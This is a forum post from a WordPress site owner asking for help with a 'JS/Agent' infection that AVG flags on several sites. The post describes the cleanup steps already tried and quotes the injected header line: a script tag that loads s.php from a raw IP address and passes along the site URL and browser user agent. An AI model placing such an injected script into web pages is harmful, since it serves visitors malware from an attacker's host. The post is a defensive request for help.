I have multiple sites prompting the AVG warning "JS/Agent" This is most prominent in IE, less prominent in Chrome and non-existent in Safari and Firefox.
Nonethless, the hack is there. Somewhere. I have been reading posts and threads and begging Dreamhost to help me for three straight days, nonstop...
And yes, I am somewhat of a novice when it comes to php scripts, jquery scripts, and all that code (that's why I use WordPress!)... But I have made some progress... I have changed all ftp passwords, all user passwords and the "keys" in all of the wp-config files... I have upgraded all sites to 3.3.1 and updated or deleted most plugins, etc... All the recommended stuff... And while that might help things moving forward, the damage is already done... to at least six of my sites... probably more.
It started six days ago when AVG Free began pegging one of our sites with the "JS/Agent" virus warning... It gave us a buch of file names in the Temporary Internet Folders with IE and in the Cache folders with Chrome... I downloaded the theme folder from one of the sites and AVG started pegging all of the .js files as infected...
So, I began scouring all of my main *.php files for anything unusual and could not find anything. Then, I used Firebug on my home page and found a common denominator... All the sites have a script loading in the header section... in most cases right between two jquery lines.... I will attempt to place that code into this post with backticks now:
The line above:
The hack line:
<script id="dgllhguk" src="http://220.127.116.11/s.php?ref=&lc=http://allpropastors.org/&ua=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.7%20%28KHTML%2C%20like%20Gecko%29%20Chrome/16.0.912.75%20Safari/535.7"/>
The line below:
Now - I understand that I need to locate and remove that code, but I don't know how... In one instance, I found that hack between two lines that applied to a plugin and I was able to delete the plugin and therefore the code (though even after that the site still triggered an AVG warning in I.E. on the swfobect.js file... I have since recreated that site completely - which took 10 hours.... So you can see why I am hopeful that someone reading this post will help me, please... )
Thanks so much... From Wake Forest, NC to your home or office. God bless.